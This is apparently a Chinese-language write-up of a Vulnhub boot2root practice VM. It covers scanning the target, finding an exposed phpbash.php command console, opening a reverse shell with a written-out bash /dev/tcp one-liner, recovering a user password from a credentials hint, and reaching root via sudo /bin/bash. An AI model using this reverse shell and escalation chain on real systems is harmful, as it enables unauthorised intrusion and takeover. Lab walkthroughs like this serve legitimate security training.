0x01 前言 什么是vulnhub？

Vulnhub是一个提供各种漏洞环境的靶场平台，供安全爱好者学习渗透使用，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，大多是Boot2root，从启动虚机到获取操作系统的root权限和查看flag。网址是：https://www.vulnhub.com

0x02 信息收集

首先运行构建好的靶机，当我们运行的时候会显示并给出我们的靶机IP地址。

之后我们可以使用浏览器去访问这个IP地址了，打开之后发现是一个类似奇怪的静态页面，不管怎么说，收集信息第一步扫目录以及对端口进行扫描，端口开放了22还有80。

经过扫描，居然发现有一个奇怪的phpbash.php页面。

打开之后发现居然可以执行命令。

0x03 利用阶段

既然有了控制台，那么第一步肯定是要反弹一个shell，我们可以使用bash -i >& /dev/tcp/[IP]/[端口] 0>&1 进行反弹shell。

反弹成功，之后我们进入/home目录进入armour用户目录发现一个Credentials.txt文件，可以cat查看一下。

这个已经给出我们提示了，意思就是将rootroot1 md5加密一次，也就是armour用户的密码。

我们可以选择进行在线加密。

0x04 提权阶段

刚才加密结果已经得出，我们可以进行切换用户了，密码正确。

之后我们可以看到两个文件，具体两个都是root权限。

之后我们看到有root权限的两个文件，我们可以通过crontab计划命令来提权，也可以直接sudo /bin/bash成为root，我就选择第二个，这样我们就可以直接拿到靶机shell了。

0xFF 总结

该靶场虽然简单，但是可以训练我们的对linux操作命令能力的熟练程度，可以有效的模拟真实环境入侵。